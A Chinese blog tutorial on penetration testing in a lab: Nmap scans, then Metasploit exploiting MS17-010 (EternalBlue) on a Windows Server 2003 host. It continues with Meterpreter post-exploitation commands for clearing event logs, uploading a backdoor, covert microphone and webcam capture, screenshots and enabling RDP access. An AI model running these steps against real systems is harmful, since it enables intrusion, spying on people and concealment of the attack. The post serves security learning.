老程序员博客

编程生涯的最后一舞

当前位置:首页 > 技术 > 正文内容

网络扫描与漏洞利用实战入门

访客 技术 2026年6月20日 1

一、实验环境配置

攻击机: Kali GNU/Linux Rolling 系统,内核版本 6.1.0-kali9-amd64,架构 x86-64。

靶机: Windows Server 2003,IP 地址为 192.168.92.100。

二、Nmap 网络探测工具使用

Nmap 是一款开源的网络发现和安全审计工具,可用于识别目标主机在线状态、开放端口、服务版本、操作系统类型等信息。

  • 探测局域网活跃主机:
    命令: nmap -sn 192.168.92.0/24
    该命令可列出子网中所有响应的 IP 地址。
  • 扫描指定端口范围:
    - 扫描默认端口(1-1000):nmap 192.168.92.100
    - 扫描特定端口:nmap -p 22,80,443,3306 192.168.92.100
    - 扫描连续端口区间:nmap -p 22-8000 192.168.92.100
  • 识别服务版本信息:
    命令:nmap -sV -p 22-8000 192.168.92.100
    可获取运行在开放端口上的具体服务及其版本。
  • 操作系统指纹识别:
    命令:nmap -O 192.168.92.100
    Nmap 会尝试推断目标系统的操作系统类型,结果确认为 Windows Server 2003。
  • 综合扫描(包含服务识别与系统检测):
    命令:nmap -A 192.168.92.100
    此命令执行全面探测,包括操作系统、服务版本、路由路径等信息。
  • 漏洞检测:
    命令:nmap --script=vuln 192.168.92.100
    通过内置脚本检测已知漏洞,例如针对 SMB 协议的 MS17-010 漏洞。

三、Metasploit 渗透框架实战

Metasploit Framework(MSF)是渗透测试领域核心工具之一,支持漏洞利用、载荷注入、后渗透操作等功能。

1. 模块结构概览

  • Auxiliary:辅助模块,用于信息收集、探测与嗅探。
  • Exploit:漏洞利用模块,触发目标系统中的安全缺陷。
  • Payload:攻击载荷,用于在成功入侵后建立控制通道。
  • Post:后渗透模块,执行提权、数据提取等操作。
  • Encoders:编码器,用于绕过杀毒软件或防火墙检测。
  • Evasion:混淆工具,生成免杀型 shellcode。
  • Meterpreter:高级后渗透代理,提供交互式控制接口。

2. 利用 MS17-010 漏洞攻陷目标系统

  1. 启动 Metasploit 客户端:
    msfconsole
  2. 搜索相关漏洞:
    search ms17-010
    选择编号为 2 的模块(auxiliary/admin/smb/ms17_010_command),用于探测是否存在该漏洞。
  3. 查看并配置参数:
    show options
    设置 TARGET 为目标地址(如 192.168.92.100),然后执行:
    run
    若返回"VULNERABLE",说明目标存在该漏洞。
  4. 执行攻击模块:
    切换到漏洞利用模块:
    use exploit/windows/smb/ms17_010_eternalblue
    再次调用 show options,填写必要参数(如 RHOSTSPAYLOAD)。
    执行:
    run
    成功后将获得一个 Meterpreter 会话。

3. Meterpreter 控制与操作

进入控制会话后,可执行以下操作:

  • lpwd:查看本地工作目录。
  • clearev:清除事件日志,防止被追踪。
  • download C:\\Windows\\system32\\drivers\\etc\\hosts:下载目标文件。
    注意:路径需使用双反斜杠表示,如 C:\\path\\file
  • upload /tmp/backdoor.exe C:\\temp\\:上传本地文件至目标主机。
  • execute -f cmd.exe -i:以交互模式执行命令行程序。
  • getuid:查看当前用户权限。
  • shell:开启原生 shell 会话。
  • search -f "*.txt":搜索特定扩展名的文件。
  • record_mic:启用麦克风录音。
  • webcam_list:列出可用摄像头设备。
  • webcam_snap -i 1 -v false:每秒拍摄一张照片。
  • screenshot:截取目标屏幕图像。
  • portfwd add -l 6666 -p 3389 -r 127.0.0.1:将目标主机的 3389 远程桌面端口映射到本地 6666 端口。
  • run post/windows/manage/enable_rdp:启用远程桌面服务,允许图形化访问。

4. 使用 rdesktop 连接目标桌面

安装客户端工具:

sudo apt install rdesktop

连接目标系统:

rdesktop -u administrator -p password 127.0.0.1:6666

若已在目标机创建管理员账户,可通过该方式直接登录其图形界面进行操控。

标签: metasploitnmap
返回列表

上一篇:Nanbeige4.1-3B本地部署:无需HuggingFace Token,快速启动AI对话服务

下一篇:智能体透明度与可解释性:构建企业级信任体系

相关文章

富文本里可以允许的 HTML 属性

一、所有标签默认允许的安全属性(极少)class        (可选)id           (通常建议禁用)title️ 注意:id 容易被滥用做锚点注入,很多系统直接禁用class 允许的话最好只允许固定前缀(如 editor-*)二、a 标签允许属性<a href="" t...

Mac 安装 Node.js 指南

方法一:通过官网安装包(最简单,适合初学者)如果你只是想快速安装并开始使用,这是最直接的方法。访问 Node.js 官网。页面会显示两个版本:LTS (Recommended For Most Users):长期支持版,最稳定。建议选这个。Current:最新特性版,包含最新功能但可能不够稳定。下载 .pkg 安装包并运行。按照安装向导点击“下一步”即可完成。方法二:使用 Homebrew 安装(...

Dom\HTML_NO_DEFAULT_NS 的副作用:自动加闭合标签

在使用Dom\HTMLDocument时,Dom\HTML_NO_DEFAULT_NS 将禁止在解析过程中设置元素的命名空间, 此设置是为了与DOMDocument向后兼容而存在的。当使用它时,已知的一个副作用就是:自动加闭合标签例如 </img> 为什么会这样?当你使用:Dom\HTML_NO_DEFAULT_NS文档会变成 无命名空间模式,此时内部更接近 XML...

Laravel 事件和监听器创建

在 Laravel 中,使用 Artisan 命令创建 Events(事件) 和 Listeners(监听器) 是非常高效的。你可以通过以下几种方式来实现:1. 手动创建单个 Event如果你只想创建一个事件类,可以使用 make:event 命令:Bashphp artisan make:event UserRegistered执行后,文件将生成在 app/Even...

自定义域名解析神器 dnsmasq

什么是 dnsmasq?dnsmasq 是一个轻量级、功能强大的网络服务工具,专为小型和中等规模网络设计。它是一个综合的网络基础设施解决方案[1]。dnsmasq 能做什么?功能说明应用场景DNS 转发与缓存将 DNS 查询转发到上游服务器(ISP、Google DNS 等),并在本地缓存结果加快 DNS 查询速度,减少外部 DNS 流量本地 DNS解析本地网络设备的主机名,无需编辑&n...

linux screen 用法详情 (nohup 的替代方案)

一、screen 是什么?能干嘛?screen 是一个终端复用器,可以:在一个 SSH 会话中开多个“虚拟终端”SSH 断线后,程序仍然在后台运行随时重新连接到原来的会话特别适合:nohup 的替代方案跑脚本 / 爬虫 / 训练模型运维、远程开发二、安装 screen# CentOS / Rocky / Almayum install -y screen# Debian / Ubuntuapt i...

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。

Copyright © agingcoder.cn

Powered By Z-BlogPHP. Theme by TOYEAN.